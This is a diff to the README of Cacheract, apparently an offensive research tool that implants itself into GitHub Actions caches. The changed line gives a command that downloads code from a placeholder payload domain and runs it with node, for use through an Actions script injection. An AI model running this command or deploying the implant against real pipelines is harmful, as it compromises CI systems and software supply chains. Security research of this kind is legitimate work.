AdnaneKhan/Cacheract/README.md

 Cacheract handles the rest, including determining if the environment is suitable for implantation and automatically deploying itself into caches after validation.

-In an Actions script injection scenario, you could use `$(curl -sSfL https://your-payload-domain.com | node)` to deploy Cacheract.
+In an Actions script injection scenario, you could use `$(curl -sSfL https://your-payload-domain.com > /tmp/run; node /tmp/run)` to deploy Cacheract.
 Note that Cacheract is only useful when deployed into main branch pipelines, otherwise it has no more value than running code as part of a Pwn Request.

 ## Future Work